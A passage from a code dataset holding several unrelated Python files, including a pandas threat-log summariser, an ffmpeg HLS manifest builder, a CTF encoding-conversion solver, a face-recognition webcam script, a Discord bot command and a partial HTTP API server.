p.apply(p_run, args=(i,))\n p.close() # 关闭pool,不能再添加新的任务\n p.join()\n end = time.time()\n print(\"所有子进程执行结束, 用时 %.3f\" % (end - start))","sub_path":"process_threading/sync_pool.py","file_name":"sync_pool.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"172522674","text":"# 讀取 CSV File\r\n\r\nimport pandas as pd # 引用 pandas 套件並縮寫為 pd \r\n\r\n# Create a Pandas Excel writer using XlsxWriter as the engine.\r\nwriter = pd.ExcelWriter('DDI_Summary.xlsx', engine='xlsxwriter')\r\n\r\n# [匯入 CSV]\r\ndf = pd.read_csv('threats.csv') \r\n\r\n# [產生 DataFrame]\r\nselect_df = pd.DataFrame(df)\r\n\r\ntest_df=select_df.ix[:, \"Source Hostname\"].notnull()\r\n\r\nprint(test_df) # 判斷哪些店名是遺失值 \r\nprint(\"---\") \r\nprint(len(test_df))\r\n\r\n\r\n# [篩選] 根據欄位值。\r\n# Create variable with TRUE if [Detection Severity] is [High]\r\ncond_Severity = df['Detection Severity'] == \"High\"\r\ncond_ProtocolGroup = df['Protocol Group'] == \"HTTP\" #'HTTP','SMTP'\r\n\r\nfiltered_df = select_df[cond_Severity & cond_ProtocolGroup]\r\n\r\n#filtered_df.to_csv('FilteredItems.csv', sep=',', encoding='utf-8')\r\nfiltered_df.to_excel(writer, sheet_name='FilteredItems')\r\n\r\n\r\n# [逐筆顯示]\r\nfor index, row in filtered_df.iterrows():\r\n \tprint(row['Date/Timestamp'], row['Detection Severity'], row['Threat Description'])\r\n \r\nprint(\"---\") \r\n \r\nprint(len(filtered_df))\r\n\r\n# [Distinct 特定欄位]\r\n#groupby_df = df.groupby('Detection Severity')['Date/Timestamp'].nunique()\r\ngroupby_df = df.groupby('Threat Description')['Date/Timestamp'].nunique()\r\n\r\n# groupby_df = df['Detection Severity'].value_counts().nunique()\r\n\r\nprint(\"---\") \r\nprint(groupby_df)\r\n\r\n#groupby_df.to_csv('ThreatType.csv', sep=',', encoding='utf-8')\r\n\r\n# Convert the dataframe to an XlsxWriter Excel object.\r\ngroupby_df.to_excel(writer, sheet_name='ThreatType')\r\n\r\n\r\n# Close the Pandas Excel writer and output the Excel file.\r\nwriter.save()","sub_path":"CSV/readExportXlsx.py","file_name":"readExportXlsx.py","file_ext":"py","file_size_in_byte":1622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"1785267","text":"#!/usr/bin/env python3\n\nimport os\nimport subprocess\nimport shlex\nimport sys\nimport time\n\nimport arg_fu\nimport dashed\nimport settings\nimport subtitle\nfrom variants import variants as variants\n\n# -hls_*\ndef hls_opts(top_level,variant):\n hls_opts=\"\"\n for k,v in settings.hls.items(): hls_opts+=\" -%s %s \"%(k,v)\n return hls_opts\n\n# for output file for ffmpeg command\ndef index_m3u8(top_level,variant):\n m3u8path =\"%s/%s/index.m3u8\"%(top_level,variant[\"name\"])\n try: m3u8path=settings.hls['hls_base_url']+m3u8path\n except: pass\n return m3u8path\n\n# variant path for master.m3u8\ndef mk_variant_path(variant):\n return \"%s/index.m3u8\"%(variant[\"name\"])\n\n# variants are placed in subdirectories by name ex. med960/index.m3u8 is the med960 variant\ndef mk_subdir(top_level,v_name):\n try: os.mkdir(\"%s/%s\"%(top_level,v_name))\n except: pass\n\ndef mk_top_level(infile):\n settings.top_level=infile.split(\".\")[0].split(\"/\")[-1].strip()\n if not settings.top_level in os.listdir('.'): os.mkdir(settings.top_level)\n\ndef m3u82master(asp,bw):\n m='#EXT-X-STREAM-INF:PROGRAM-ID=1,BANDWIDTH=%s,RESOLUTION=%s,CODECS=\"avc1.42e00a,mp4a.40.2\"\\n'%(bw,asp)\n if settings.subfile: m='%s,SUBTITLES=\"webvtt\"\\n'%m.replace(\"\\n\",'')\n return m\n\n# sort by bandwidth for the master.m3u8, smaller variants go first\ndef bw_sort(all_variants):\n sorted=[]\n bwlist=[]\n for v in all_variants: bwlist.append(variants[v]['bandwidth'])\n bwlist.sort()\n for b in bwlist:\n for v in all_variants: \n if variants[v]['bandwidth']==b: sorted.append(v)\n sorted.reverse()\t \n return sorted\n\n# previously encoded variants are added to the master.m3u8 as well.\ndef scan_for_variants(top_level):\n all_variants=[]\n vlist=variants.keys()\n dirlist=os.listdir(top_level)\n for v in vlist:\n if v in dirlist: all_variants.append(v)\n all_variants=bw_sort(all_variants)\n print(\"\\tvariants found %s\"%\" \".join(all_variants))\n return all_variants\n\ndef mk_subs(top_level,variant):\n for i in os.listdir(\"%s/%s\"%(top_level,variant)):\n if i.endswith(\"vtt\") or i.endswith(\"vtt.m3u8\"):\n os.renames(\"%s/%s/%s\"%(top_level,variant,i),\"%s/subs/%s\"%(top_level,i))\n\ndef mk_master():\n '''\n write master.m3u8\n '''\n print(\"Writing master.m3u8\")\n all_variants=scan_for_variants(settings.top_level)\n master=open('%s/master.m3u8'%settings.top_level,'w')\n master.write(\"#EXTM3U \\n\")\n if settings.subfile:\n print(\"Adding subtitles\")\n master.write('#EXT-X-MEDIA:TYPE=SUBTITLES,GROUP-ID=\"webvtt\",NAME=\"English\",DEFAULT=YES,AUTOSELECT=YES,FORCED=NO,LANGUAGE=\"en\",URI=\"subs/vtt_index.m3u8\"\\n')\n for variant in all_variants:\n if settings.subfile: mk_subs(settings.top_level,variant)\n v=variants[variant]\n vpath=mk_variant_path(v)\n m=m3u82master(v['aspect'],v['bandwidth'])\n master.write(m)\n master.write(vpath+\"\\n\")\n master.close()\n\ndef mk_switches(v):\n '''\n generate switches for ffmpeg\n '''\n tl=settings.top_level\n st=settings\n sw = [ dashed.i(v['infile'],st.subfile), \n\tdashed.vf(v['aspect']), dashed.cv(st.vcodec),dashed.bv(v['vbitrate']), \n\t dashed.maxrate(v['maxrate']), dashed.ba(v['abitrate']), \n\tdashed.meta(), hls_opts(tl,v),index_m3u8(tl,v)]\n return sw\n\ndef mk_ffcmd(variant):\n '''\n Assemble the ffmpeg command\n '''\n ffcmd=\"ffmpeg -threads 0\"\n v=variants[variant]\n mk_subdir(settings.top_level,v['name'])\n switches=mk_switches(v)\n ffcmd=\"%s %s\"%(ffcmd,\" \".join(switches))\n return ffcmd\n\ndef mk_variant(variant):\n print(\"Starting variant %s\"%variant)\n variants[variant]['infile']=settings.infile\n ffcmd=mk_ffcmd(variant)\n subprocess.call(shlex.split(ffcmd))\n \n\ndef mk_all():\n '''\n loop through variants and assemble the ffmpeg command\n '''\n if settings.req_variants==\"all\":\n settings.req_variants=list(variants.keys())\n for variant in settings.req_variants:\n mk_variant(variant) \n mk_master()\n \ndef set_infile(infile=None):\n infile=infile.strip()\n if infile:\n settings.infile=infile\n mk_top_level(infile)\n else:\n print(\"set infile with -i video.file\")\n sys.exit()\n\ndef set_subfile(subfile=None):\n if subfile: \n settings.subfile=subfile.strip()\n if settings.subfile:\n sd=subtitle.Decoder(settings.subfile)\n settings.subfile=sd.outfile\t\n return\n\ndef set_variants(req_list=\"all\"):\n if req_list ==\"all\":\n settings.req_variants=list(variants.keys())\n else:\n settings.req_variants=[]\n req_list=req_list.split(\" \")\n for rv in req_list:\n if rv in list(variants.keys()): settings.req_variants.append(rv)\n return \n\ndef show_variants():\n for v in list(variants.keys()): \n print(v)\n for k,v in variants[v].items():\n print(k ,' ',v)\n return\n\nif __name__ == '__main__':\n settings.req_variants=\"all\"\n arg_fu.add_action('-i', set_infile,'set input video file')\n arg_fu.add_action('-s', set_subfile,'set subtitle input file')\n arg_fu.add_action('--variants', set_variants,'Specify variant list')\n arg_fu.add_action('--show', show_variants,' Show available variants')\n arg_fu.process(ordered=['-h','--help','-i','-s','--variants','--show'])\n mk_all()\n\n","sub_path":"manifesto.py","file_name":"manifesto.py","file_ext":"py","file_size_in_byte":5336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"237900146","text":"import kdd\nfrom wisardpkg import DataSet, RegressionWisard, SimpleMean\nimport time\n\nfiles = open(\"ntuple-test.txt\", \"w+\")\n\nds_train = DataSet()\n\nds = DataSet(\"DS_train.wpkds\")\n\nfor i in range(0, len(ds)):\n ds_train.add(ds.get(i), ds.getY(i))\n\nds_test = DataSet(\"DS_test.wpkds\")\n\nfor i in range(1, 11):\n for address in range(5, 32):\n t_train = time.time()\n rew = RegressionWisard(address, mean = SimpleMean(), orderedMapping=True, completeAddressing=True)\n rew.train(ds_train)\n t_train = t_train - time.time()\n t_test = time.time()\n out = rew.predict(ds_test)\n t_test = t_test - time.time()\n kdd.create_output_file(out, \"ntuple\")\n files.write(\"address: \" + str(address) + \"; training time: \" + str(t_train) + \"; test time: \" + str(t_test) + \"\\n\")\n\nfiles.close()\n\n","sub_path":"regression/kdd/test_ntuple.py","file_name":"test_ntuple.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"356001599","text":"from pwn import *\nimport base64\nimport binascii\n\n\nr = remote(\"challenge.acictf.com\", 19816)\n\ndef convert(s, e, stuff):\n\traw = \"\"\n\tif s == \"raw\":\n\t\traw = stuff\n\telif s == \"b64\":\n\t\traw = base64.b64decode(stuff)\n\telif s == \"hex\":\n\t\traw = binascii.unhexlify(stuff)\n\telif s == \"dec\":\n\t\traw = binascii.unhexlify(hex(int(stuff, 10)).rstrip(\"L\").lstrip(\"0x\"))\n\telif s == \"oct\":\n\t\traw = binascii.unhexlify(hex(int(stuff, 8)).rstrip(\"L\").lstrip(\"0x\"))\n\telif s == \"bin\":\n\t\traw = binascii.unhexlify(hex(int(stuff, 2)).rstrip(\"L\").lstrip(\"0x\"))\n\telse:\n\t\tprint(\"start method not found\")\n\n\tres = \"\"\n\tif e == \"raw\":\n\t\tres = raw.encode(\"utf-8\")\n\telif e == \"b64\":\n\t\tres = base64.b64encode(raw)\n\telif e == \"hex\":\n\t\tres = binascii.hexlify(raw).rstrip(\"L\")\n\telif e == \"dec\":\n\t\tres = str(int(binascii.hexlify(raw), 16))\n\telif e == \"oct\":\n\t\tres = str(oct(int(binascii.hexlify(raw), 16))).lstrip(\"0\").rstrip(\"L\")\n\telif e == \"bin\":\n\t\tres = bin(int(binascii.hexlify(raw), 16)).lstrip(\"0b\")\n\telse:\n\t\tprint(\"end method not found\")\n\n\treturn res\n\nfor i in range(5):\n\tr.recvuntil(\"--\")\n\tr.recvline()\n\tconversion = r.recvline().rstrip().split(\" -> \")\n\tstart = conversion[0]\n\tend = conversion[1]\n\tstuff = r.recvline().rstrip()\n\tresp = convert(start, end, stuff)\n\n\tprint(\"{} Converting {} to {}\\nOriginal: {}\\nConverted: {}\\n\".format(i, start, end, stuff, resp))\n\tr.recvuntil(\"answer: \")\n\tr.sendline(resp)\n\nr.interactive()\n","sub_path":"Miscellaneous/bases.py","file_name":"bases.py","file_ext":"py","file_size_in_byte":1389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"78471664","text":"from tkinter import *\r\nfrom random import choice\r\n\r\nApp = Tk()\r\nApp.title(\"CheckBox\")\r\nApp.geometry('350x250')\r\n\r\ncheck = StringVar()#Store integer values\r\n#create checkbox\r\nchk = Checkbutton(App, text='Checkbox', variable=check, onvalue='yes', offvalue='Nope')\r\nchk.deselect()\r\nchk.pack()\r\n\r\ndef show():\r\n msg=Label(App, text=check.get())\r\n msg.pack()\r\n\r\nB = Button(App, text='show', command=show )\r\nB.pack()\r\nApp.mainloop()#execution","sub_path":"CheckBox.py","file_name":"CheckBox.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"32852207","text":"from dataclasses import dataclass\nfrom typing import Dict\n\n\n@dataclass\nclass PostPayload:\n sub: str = None # Must be provided\n title: str = None # Must be provided\n text: str = \"\" # Needs to be empty if it is a title only post, but None if it is a link post\n link: str = None\n image: str = None\n video: str = None\n parent: str = None\n flair_id: str = None\n flair_text: str = None\n collection_id: str = None\n sort: str = None\n comment_text: str = None\n date: str = \"7,23\"\n spoiler: bool = False\n nsfw: bool = False\n lock: bool = False\n contest: bool = False\n dont_notify: bool = False\n distinguish: bool = False\n sticky: bool = False\n lock_comment: bool = False\n distinguish_comment: bool = False\n sticky_comment: bool = False\n wait: bool = True\n\n _overrides_dict: Dict = None\n\n def get_overrides_dict(self) -> Dict:\n return self._overrides_dict\n\n @staticmethod\n def from_overrides(overrides_dict: Dict):\n # Use python black magic to convert the dictionary to our data class (overwriting only the provided fields)\n # for easy and consistent use\n payload = PostPayload(**overrides_dict)\n payload._overrides_dict = overrides_dict\n return payload\n","sub_path":"postpayload.py","file_name":"postpayload.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"196379158","text":"import face_recognition\nimport face_preload\nimport numpy as np\nimport cv2\nimport os\n\nface_dir = os.path.abspath('./known')\nface_list = os.listdir(face_dir)\n\n# Load known face\ndef loadFace(k_encodings, k_names, add_new=False):\n\n\tfor face_image in face_list:\n\t\timg = face_recognition.load_image_file(os.path.join(face_dir, face_image))\n\t\tk_encodings.append(face_recognition.face_encodings(img)[0])\n\t\tk_names.append(face_image[:-4])\n\n\treturn k_encodings, k_names\n\ncamera_cap = cv2.VideoCapture(0)\n\n\n# Initialize some variables\nface_locations = []\nface_encodings = []\nface_names = []\nprocess_this_frame = True\n\n# known_face_encodings = []\n# known_face_names = []\n# known_face_encodings, known_face_names = loadFace(known_face_encodings, known_face_names)\nknown_face_encodings, known_face_names = face_preload.loadPreload('preload_data_2.json')\n\nwhile True:\n\tret, frame = camera_cap.read()\n\tkey_stroke = cv2.waitKey(1) & 0xff\n\n\tif key_stroke == ord('q'):\n\t\tbreak\n\n\t# Add new face and reload\n\telif key_stroke == ord('c'):\n\t\tf_name = input('Your name: ') + '.jpg'\n\t\tf_name = os.path.join(face_dir, f_name)\n\t\tcv2.imwrite(f_name, frame)\n\n\t\tknown_face_encodings, known_face_names = face_preload.loadFaces(f_name)\n\n\t\tprint('[+] New face added and loaded')\n\n\t# Resize frame of video to 1/4 size for faster face recognition processing\n\tsmall_frame = cv2.resize(frame, (0, 0), fx=0.25, fy=0.25)\n\n\t# Convert BGR (opencv) to RGB (face_recognition)\n\trgb_small_frame = small_frame[:, :, ::-1]\n\n\t# Only process every other frame of video to save time\n\tif process_this_frame:\n\t\t# Find all the faces and the face encodings in the current frame of video\n\t\tface_locations = face_recognition.face_locations(rgb_small_frame)\n\t\tface_encodings = face_recognition.face_encodings(rgb_small_frame, face_locations)\n\n\t\tface_names = []\n\t\tfor face_encoding in face_encodings:\n\t\t\t# See if the face is a match for the known face(s)\n\t\t\tmatches = face_recognition.compare_faces(known_face_encodings, face_encoding)\n\t\t\tname = \"Unknown\"\n\n\t\t\t# If a match was found in known_face_encodings, just use the first one.\n\t\t\tif True in matches:\n\t\t\t\tfirst_match_index = matches.index(True)\n\t\t\t\tname = known_face_names[first_match_index]\n\n\t\t\t# # Or instead, use the known face with the smallest distance to the new face\n\t\t\t# face_distances = face_recognition.face_distance(known_face_encodings, face_encoding)\n\t\t\t# best_match_index = np.argmin(face_distances)\n\t\t\t# if matches[best_match_index]:\n\t\t\t# \tname = known_face_names[best_match_index]\n\n\t\t\tface_names.append(name)\n\n\tprocess_this_frame = not process_this_frame\n\n\t# Display the results\n\tfor (top, right, bottom, left), name in zip(face_locations, face_names):\n\t\t# Scale back up face locations since the frame we detected in was scaled to 1/4 size\n\t\ttop *= 4\n\t\tright *= 4\n\t\tbottom *= 4\n\t\tleft *= 4\n\n\t\t# Draw a box around the face\n\t\tcv2.rectangle(frame, (left, top), (right, bottom), (0, 0, 255), 2)\n\n\t\t# Draw a label with a name below the face\n\t\tcv2.rectangle(frame, (left, bottom - 35), (right, bottom), (0, 0, 255), cv2.FILLED)\n\t\tfont = cv2.FONT_HERSHEY_DUPLEX\n\t\tcv2.putText(frame, name, (left + 6, bottom - 6), font, 1.0, (255, 255, 255), 1)\n\n\tcv2.imshow('frame', frame)\n\n\ncamera_cap.release()\ncv2.destroyAllWindows()","sub_path":"face_cpc.py","file_name":"face_cpc.py","file_ext":"py","file_size_in_byte":3223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"21077776","text":"__all__ = ()\n\nfrom hata.ext.slash import Button, abort\n\nfrom ....bots import SLASH_CLIENT\n\nfrom ...touhou_core import (\n TOUHOU_CHARACTERS_UNIQUE, TouhouHandlerKey, get_touhou_character_like, get_touhou_character_names_like\n)\nfrom ...touhou_core.characters import (\n CHIRUNO, FUJIWARA_NO_MOKOU, HAKUREI_REIMU, HATA_NO_KOKORO, HINANAWI_TENSHI, HONG_MEILING, IZAYOI_SAKUYA,\n KAZAMI_YUUKA, KIRISAME_MARISA, KOCHIYA_SANAE, KOMEIJI_KOISHI, KOMEIJI_SATORI, MARGATROID_ALICE, MORIYA_SUWAKO,\n PATCHOULI_KNOWLEDGE, REISEN_UDONGEIN_INABA, RUMIA, SAIGYOUJI_YUYUKO, SCARLET_FLANDRE, SCARLET_REMILIA,\n SHAMEIMARU_AYA, SHIKI_EIKI_YAMAXANADU, TATARA_KOGASA, TOYOSATOMIMI_NO_MIKO, YAKUMO_YUKARI\n)\n\nfrom ..constants import EMOJI_NEW\n\nfrom .touhou_character import (\n NewTouhouCharacter, build_no_match_embed, build_touhou_character_embed, make_custom_id_of_character\n)\n\n\n\n@SLASH_CLIENT.interactions(is_global = True)\nasync def touhou_character(\n client,\n event,\n name: ('str', 'Who\\'s?'),\n):\n \"\"\"Shows you the given Touhou character's portrait.\"\"\"\n name_length = len(name)\n if name_length == 0:\n abort('Empty name was given.')\n \n touhou_character = get_touhou_character_like(name)\n if (touhou_character is None):\n return build_no_match_embed(name)\n \n handler = TouhouHandlerKey(touhou_character, solo = True).get_handler()\n image_detail = await handler.get_image(client, event)\n \n embed = build_touhou_character_embed(touhou_character, image_detail)\n \n if image_detail is None:\n components = None\n else:\n components = Button(\n emoji = EMOJI_NEW,\n custom_id = make_custom_id_of_character(touhou_character),\n )\n \n if event.is_unanswered():\n function = type(client).interaction_response_message_create\n else:\n function = type(client).interaction_response_message_edit\n \n await function(\n client,\n event,\n embed = embed,\n components = components,\n )\n\n\nPOPULAR_TOUHOU_CHARACTER_NAMES = [\n KOMEIJI_KOISHI.name,\n KIRISAME_MARISA.name,\n HAKUREI_REIMU.name,\n SCARLET_FLANDRE.name,\n IZAYOI_SAKUYA.name,\n SCARLET_REMILIA.name,\n FUJIWARA_NO_MOKOU.name,\n KOMEIJI_SATORI.name,\n SAIGYOUJI_YUYUKO.name,\n SHAMEIMARU_AYA.name,\n MARGATROID_ALICE.name,\n KOCHIYA_SANAE.name,\n REISEN_UDONGEIN_INABA.name,\n HINANAWI_TENSHI.name,\n YAKUMO_YUKARI.name,\n HATA_NO_KOKORO.name,\n CHIRUNO.name,\n PATCHOULI_KNOWLEDGE.name,\n TATARA_KOGASA.name,\n RUMIA.name,\n MORIYA_SUWAKO.name,\n SHIKI_EIKI_YAMAXANADU.name,\n KAZAMI_YUUKA.name,\n HONG_MEILING.name,\n TOYOSATOMIMI_NO_MIKO.name,\n]\n\n\n@touhou_character.autocomplete('name')\nasync def auto_complete_touhou_character_name(name):\n if name is None:\n touhou_character_names = POPULAR_TOUHOU_CHARACTER_NAMES\n else:\n touhou_character_names = get_touhou_character_names_like(name)\n \n return touhou_character_names\n\n\n\nfor touhou_character in TOUHOU_CHARACTERS_UNIQUE:\n SLASH_CLIENT.interactions(\n NewTouhouCharacter(TouhouHandlerKey(touhou_character, solo = True).get_handler(), touhou_character),\n custom_id = make_custom_id_of_character(touhou_character),\n )\n\ntouhou_character = None\n\ndel touhou_character\n","sub_path":"koishi/plugins/image_handling_commands/touhou_character/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":3305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"12123219","text":"#-*- coding: cp949 -*- \n#ddanzi newslist parse\nfrom bs4 import BeautifulSoup\nfrom urllib.request import Request,urlopen\nfrom urllib.parse import urljoin\n\nbase_url = \"http://www.ddanzi.com/ddanziNews\"\n\nurl_request = Request(base_url,headers={'User-Agent': 'Mozilla/5.0'})\n\nboard = urlopen(url_request).read()\n\nbs4_ddanzi = BeautifulSoup(board,\"html.parser\")\n#find_for = bs4_ddanzi.find_all(\"tr\",attrs={'class':\"notice\"})\nfind_else = bs4_ddanzi.find_all(\"td\",attrs={'class':'title'})\n\nfor r in find_else:\n print(r.find('a').get_text(strip=True))\n \n\n","sub_path":"yb_ddanzi.py","file_name":"yb_ddanzi.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"119094376","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nfrom math import cos, sin, radians, pi\n\nfrom fscore.forces import Force\n\n\ndef sideforce_by_element_fossati(boatspeed, heel_angle, leeway_angle, rudder_angle, coe, projected_area, span,\n aspect_ratio_mutiplier=2., use_cos_heel_angle=True, rudder_angle_influence=0.,\n speed_multiplier=1.0, rho_water=1025.):\n \"\"\"Lift (i.e. sideforce) and drag due to lift [N] of an underwater element, mostly due to leeway.\n Viscous effects (friction and pressure drag) are not accounted for.\n\n Parameters\n ----------\n boatspeed : float\n boat speed [m/s]\n heel_angle : float, optional (default 0.)\n The heel_angle [degrees], between -90 and 90.\n leeway_angle : float, optional (default 0.)\n rudder_angle : float, optional (default 0.)\n\n coe : list of 3 floats\n Represents the x, y, z coordinates of the centre of effort.\n The centre of effort can be estimated by projecting the projected surface barycentre to the 1/4 chord line.\n projected_area : float\n Projected area [m**2] of the underwater element, must be >= 0\n span : float\n Span [m] of the underwater element, must be >= 0.\n aspect_ratio_mutiplier : float, optional (default 2.)\n Must be between 0.5 and 2.5\n Modifier of the geometric aspect ratio calculated from projected area and span to get effective aspect ratio\n Use 2. for a lifting plane with a plate effect at one end.\n use_cos_heel_angle : boolean, optional (default True).\n If True, multiply the angle of attack by the cosine of the heel angle.\n If False, use the raw angle of attack.\n Use False for the hull / canoebody; use True for keel and rudder.\n rudder_angle_influence : float, optional (default 0.)\n Must be between 0 and 1.\n Fraction of the rudder angle to add to the angle of attack.\n Normally, use 1. for a rudder, 0. otherwise.\n speed_multiplier : float, optional (default 1.0)\n Must be between 0.6 and 1.4.\n Multiplier of the free flow speed.\n A current practice is, for example, to use a 0.9 speed multiplier for the rudder.\n rho_water : float, optional (default 1025.)\n Water density [kg/m**3], must be >= 0\n\n References\n ----------\n http://books.google.fr/books?id=-cFbdmv4ScoC&pg=PA143&lpg=PA143&dq=hull+keel+leeway+coefficient&source=bl&ots=FR3-j2SEsk&sig=sf5wY8UcdousMeUIpsmOBrHtUgw&hl=fr&sa=X&ei=Ch96UoD9OMyQ0QXFtIDoDA&ved=0CGsQ6AEwBw#v=onepage&q=hull%20keel%20leeway%20coefficient&f=false\n\n Returns\n -------\n a Force object, representing the sideforce and induced drag [N] on the hull.\n\n \"\"\"\n assert projected_area >= 0.\n assert span > 0.\n assert 0.5 <= aspect_ratio_mutiplier <= 2.5\n assert 0 <= rudder_angle_influence <= 1.\n assert 0.6 <= speed_multiplier <= 1.4\n assert 950 < rho_water < 1050\n\n geometric_aspect_ratio = span**2 / projected_area\n effective_aspect_ratio = geometric_aspect_ratio * aspect_ratio_mutiplier\n\n cl_alpha_3d = 0.105 / (1. + (1.92 / effective_aspect_ratio))\n\n boatspeed_sign = boatspeed / abs(boatspeed) if boatspeed != 0. else 0.\n if use_cos_heel_angle:\n Cl = cl_alpha_3d * (leeway_angle + rudder_angle_influence * rudder_angle) * cos(radians(heel_angle))\n else:\n Cl = cl_alpha_3d * (leeway_angle + rudder_angle_influence * rudder_angle)\n\n lift = Cl * 0.5 * rho_water * projected_area * (boatspeed * speed_multiplier)**2\n\n # induced drag coefficient\n oswald_efficiency_factor = 0.9\n Cdi = Cl**2 / (pi * effective_aspect_ratio * oswald_efficiency_factor)\n\n induced_drag = 0.5 * Cdi * rho_water * projected_area * (boatspeed * speed_multiplier)**2\n\n return Force([-induced_drag * boatspeed_sign,\n -lift * cos(radians(heel_angle)) * boatspeed_sign,\n lift * sin(radians(heel_angle)) * boatspeed_sign],\n [coe[0],\n coe[1] + coe[2] * sin(radians(heel_angle)),\n coe[2] * cos(radians(heel_angle))])\n","sub_path":"fshydro/sideforce/fossati.py","file_name":"fossati.py","file_ext":"py","file_size_in_byte":4107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"95981185","text":"import json\nimport time\nimport base64\nimport fnmatch\nimport requests\nimport threading\nimport collections\n\nimport synapse.dyndeps as s_dyndeps\nimport synapse.eventbus as s_eventbus\nimport synapse.mindmeld as s_mindmeld\n\nfrom synapse.common import *\n\ndef initkey(**info):\n info.setdefault('en',True)\n info.setdefault('name',None)\n info.setdefault('roles',[])\n info.setdefault('allows',[])\n return info\n\ndef initrole(**info):\n info.setdefault('en',True)\n info.setdefault('allows',[])\n return info\n\ndef initconf():\n return {\n 'port':8080,\n 'host':'0.0.0.0',\n 'pool':16,\n\n 'sslkey':None,\n 'sslcert':None,\n\n 'melddir':None, # where do we store mindmeld packages?\n\n 'roles':{\n # :{\n # 'en':True,\n # 'allows':[\n # ('/context/v1/*',{'rate':(10,60), }),\n # ],\n # }\n 'root':{\n 'en':True,\n 'allows':{\n '*':{},\n }\n },\n },\n\n 'apikeys':{\n # :{\n # 'en':True,\n # 'name':'woot',\n # 'roles':[],\n # 'allows':[\n # ('/context/v1/*',{'rate':(10,60), }),\n # ],\n # }\n guidstr():{\n 'en':True,\n 'name':'root',\n 'roles':[],\n 'allows':[\n ('*',{}),\n ],\n },\n\n #None:{\n #'en':False,\n #'allows':[],\n #},\n },\n\n 'objects':{\n # :('',args,kwargs),\n },\n\n 'apipaths':{\n # :{'obj':,'meth':},\n },\n\n 'filepaths':{\n # :{'filepath':},\n },\n\n }\n\nclass DupRole(Exception):pass\nclass DupApiKey(Exception):pass\nclass NoSuchApiObj(Exception):pass\nclass NoSuchApiKey(Exception):pass\nclass NoSuchApiPath(Exception):pass\nclass NoSuchCtor(Exception):pass\n\ndef httppath(path):\n '''\n '''\n def wraphttp(f):\n f._http_apipath = path\n return f\n return wraphttp\n\nclass HttpApi(s_eventbus.EventBus):\n\n def __init__(self, jsinfo=None, jsfile=None):\n if jsinfo == None:\n jsinfo = initconf()\n\n s_eventbus.EventBus.__init__(self)\n\n self.jsfile = jsfile\n self.jsinfo = jsinfo\n self.jslock = threading.Lock()\n\n self.objs = {}\n self.melds = []\n self.pathmeths = {}\n self.rulecache = {} # (apikey,path):\n\n self.jsinfo.setdefault('objects',{})\n self.jsinfo.setdefault('apikeys',{})\n self.jsinfo.setdefault('apipaths',{})\n self.jsinfo.setdefault('filepaths',{})\n\n melddir = self.jsinfo.get('melddir')\n if melddir != None:\n if not os.path.isdir(melddir):\n raise Exception('Invalid melddir: %s' % (melddir,))\n\n for filename in os.listdir(melddir):\n meldpath = os.path.join(melddir,filename)\n if not os.path.isfile(meldpath):\n continue\n\n with open(meldpath,'rb') as fd:\n b64 = fd.read().decode('utf8')\n self._loadMeldBase64(b64)\n\n for name,(ctor,args,kwargs) in self.jsinfo['objects'].items():\n self._loadApiObject(name,ctor,*args,**kwargs)\n\n for path,info in self.jsinfo['apipaths'].items():\n objname = info.get('obj')\n methname = info.get('meth')\n self._loadApiPath(path,objname,methname)\n\n self.loadHttpPaths(self)\n\n def runHttpGet(self, path, headers, body):\n '''\n Run an HTTP GET request through the HttpApi.\n Returns a tuple of (code,headers,retinfo) for the response.\n\n Example:\n\n code,headers,retinfo = api.runHttpGet(path, hdrs, body)\n\n '''\n return self.runHttpPost(path, headers, body)\n\n def runHttpPost(self, path, headers, body):\n '''\n Run an HTTP POST request through the HttpApi.\n Returns a tuple of (code,headers,retinfo) for the response.\n\n Example:\n\n code,headers,retinfo = api.runHttpPost(path, hdrs, body)\n\n Notes:\n\n POST /path/to/api HTTP/1.1\n content-length: 43\n content-type: application/json\n apikey: asdfasdfasdfasdf\n\n {\"args\":[arg0,arg1],\"kwargs\":{\"foo\":\"bar\"}}\n\n '''\n apikey = headers.get('apikey')\n try:\n jsreq = json.loads(body.decode('utf8'))\n except Exception as e:\n return self._initErrResp(500,'BadJsonBody',msg=str(e))\n\n args = jsreq.get('args',())\n kwargs = jsreq.get('kwargs',{})\n\n return self.runHttpPath(apikey, path, *args, **kwargs)\n\n def _initErrResp(self, code, err, **retinfo):\n retinfo['err'] = err\n return (code,{},retinfo)\n\n def _initRetResp(self, code, ret, **retinfo):\n retinfo['ret'] = ret\n return (code,{},retinfo)\n\n def runHttpPath(self, apikey, path, *args, **kwargs):\n ruleinfo = self.getApiKeyAllow(apikey, path)\n if ruleinfo == None:\n return self._initErrResp(403,'PermDenied',msg='No Allow Rule')\n\n meth = self.pathmeths.get(path)\n if meth == None:\n return self._initErrResp(404, 'NoSuchApiPath', msg=path)\n\n try:\n return self._initRetResp(200, meth(*args,**kwargs) )\n except Exception as e:\n return self._initErrResp(200, e.__class__.__name__, msg=str(e))\n\n def loadHttpPaths(self, obj):\n '''\n Load any httppath decorated methods from the obj.\n\n Example:\n\n class Woot:\n\n @httppath('/foo/bar')\n def foobar(self):\n return 'hi'\n\n w = Woot()\n api = HttpApi()\n api.loadHttpPaths(w)\n\n '''\n for name in dir(obj):\n meth = getattr(obj, name, None)\n path = getattr(meth, 